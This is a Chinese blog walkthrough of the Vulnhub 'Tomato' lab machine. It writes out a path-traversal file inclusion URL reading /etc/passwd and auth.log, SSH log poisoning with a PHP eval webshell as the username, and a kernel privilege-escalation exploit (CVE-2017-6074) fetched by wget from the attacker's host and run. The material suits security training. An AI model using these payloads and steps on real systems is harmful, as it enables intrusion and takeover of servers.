VulnhubTomato靶机详解

最新推荐文章于 2024-08-14 16:28:31 发布
最新推荐文章于 2024-08-14 16:28:31 发布
阅读量408 收藏 8
点赞数 10
分类专栏: 靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62457642/article/details/140896714
版权

项目地址

https://www.vulnhub.com/entry/tomato-1,557/

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

image.png

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

image.png

根据对比可知Tomato的一个ip地址为192.168.47.141

扫描earth的操作系统,端口及对应服务

nmap -A -p- 192.168.47.141

image.png

发现开放21,80,2211,8888端口

扫描目录

dirb http://192.168.47.141

image.png

访问页面

image.png
没有有用信息

访问8888端口

image.png
需要账号密码

访问用dirb扫出来的站点

image.png

发现站点目录

image.png

查看info.php

image.png

查看源码

image.png
发现有文件包含漏洞

对网址进行包含尝试
http://192.168.47.141/antibot_image/antibots/info.php?image=../../../../../../etc/passwd

image.png
:::info
存在
tomato❌1000:1000:Tomato,:/home/tomato:/bin/bashsshd❌108:65534::/var/run/sshd:/usr/sbin/nologin ftp❌109:117:ftp daemon,:/srv/ftp:/bin/false
:::

尝试用tomato为用户名登陆一下(kali不行换CentOS)

image.png
登录失败

查看它的一个日志
http://192.168.47.141/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

image.png
发现用户名被写了进去

尝试用php代码作为用户名进行注入
ssh '<?php @eval($_POST['cmd']); ?>'@192.168.47.141 -p 2211

image.png
发现被写了进去

尝试用蚁剑进行一个连接

image.png
连接成功

右键打开终端

image.png

提权

寻找有无可以利用的 exp
uname -a

image.png

使用命令下载(要使用CVE-2017-6074)
git clone https://github.com/kkamagui/linux-kernel-exploits

image.png

在kali运行sh文件编译,编译成功之后会生成一个文件

image.png

开启KALI的apache服务
service apache2 start

把生成的文件放在网站目录下面也就是/var/www/html目录下面
cp CVE-2017-6074 /var/www/html/

回到蚁剑

在tmp目录下面使用wget命令下载kali刚刚复制的文件用来提权,顺便赋予777权限

cd tmp
wget http://192.168.47.129/CVE-2017-6074
chmod 777 CVE-2017-6074

image.png
image.png
在靶机运行即可
这边一运行虚拟机就直接卡死了
网上查看了一番应该是成功了

秋妤.
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4171
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
DC-9靶机渗透详解
xiaocainiao2017的博客
12-07 2875
DC-9靶机 查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 扫描dc-9端口 访问80端口 查看wappalyzer dirb http://10.9.11.26/ 扫描目录 进入css 点击style.css 进另一个目录includes dirb效果不太好,使用dirmap。 访问http://10.9.11.26/display.php
VulnhubJANGOW靶机详解
weixin_62457642的博客
08-05 494
靶机JANGOW速刷
VulnhubJIS-CTF靶机详解
weixin_62457642的博客
08-11 798
靶机JIS-CTF速刷
gigachad1靶机详解
weixin_44681307的博客
07-11 452
在kali中搜索一下有没有漏洞,结果搜索到了一个,我们下载到本机上,然后用python开启一个http服务传到靶机。Google识图一下,百度找不到的,发现是叫做少女塔,这里ssh密码其实就出来了,就是maidenstower。file一下发现是一个zip文件,unzip解压一下,发现给了一个用户名chad,一个图片地址。我们下载到靶机的/tmp目录中,加一个执行权限,运行一下,发现root权限了。扫描到ip后对ip做一个全面扫描,发现有一个匿名服务器,是可以免密登陆的。sudo命令是没有的,我都试过了。
vulnhub之XXE靶机详解
天天学安全专属博客
03-20 872
vulnhub之XXE靶机详解
potato-suncsr靶机详解
weixin_44681307的博客
07-10 558
登陆上以后发现就一个大土豆,扫描了一下目录就扫到一个phpinfo页面,也没什么用,这个网页标题是个potato,就想着爆破一下密码,结果很快就出来了个密码。ssh登陆一下,这个靶场里面依然搜索不到什么可用的东西,sudo -l 或者 查找有root权限的文件都没有可用的。首先扫描靶机ip地址,找到以后我又对靶机进行了一个全端口扫描,发现它的ssh端口号是7120.这个靶机说是一个简单偏难的,但是我觉得这个靶机是我做过最简单的一个。发现还不少,我就直接用了第一个。简单的不能再简单的一个靶场。
Vulnhub JIS-CTF靶机详解
muyuchen110的博客
08-14 642
Vulnhub JIS-CTF靶机详解!!!!
DC1-靶机详解
TonyChaoWei的博客
02-06 1828
DC系列靶机渗透实战 提权
XXE靶机详解
like_niustyle的博客
09-14 657
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个少一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
DC-2渗透靶机详解
weixin_51083551的博客
07-25 1686
萌新DC系列靶机渗透详解之DC-2 DC-1 结束之后开始 DC-2 的内容 1. 明确目标 目标肯定还是不变的嘛,还是找齐里面所有的 flag 根据每个 flag 的提示找到下一个 flag 2. 信息收集 靶机是在同一个网段下使用的 还是 arp-scan 扫描即可 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111 Starting arp-scan 1.9.7 with
DC-1渗透靶机详解
weixin_51083551的博客
07-18 2909
萌新DC系列靶机渗透详解之DC-1 在渗透测试之前,有自己的渗透思路 1. 明确目标 我们的目标应该是找齐里面所有的 flag 根据每个 flag 的提示找到下一个 flag 2. 信息收集 使用扫描工具寻找目标ip,在同一个网段下使用 arp-scan 扫描即可 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111 Starting arp-scan 1.9.7 with 256
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8452
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
中国石油大学(北京)克拉玛依校区在广东2021-2024各专业最低录取分数及位次表.pdf
09-08
全国各大学在广东省2021~2024年各专业最低录取分数及位次
浙江越秀外国语学院在广东2021-2024各专业最低录取分数及位次表.pdf
09-08
全国各大学在广东省2021~2024年各专业最低录取分数及位次
网站模板源代码(组件划分规范,二改省力)
最新发布
09-08
组件划分规范,二改省力!!!
华中科技大学 Java课程设计实验.zip
09-08
华中科技大学 Java课程设计实验.zip
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值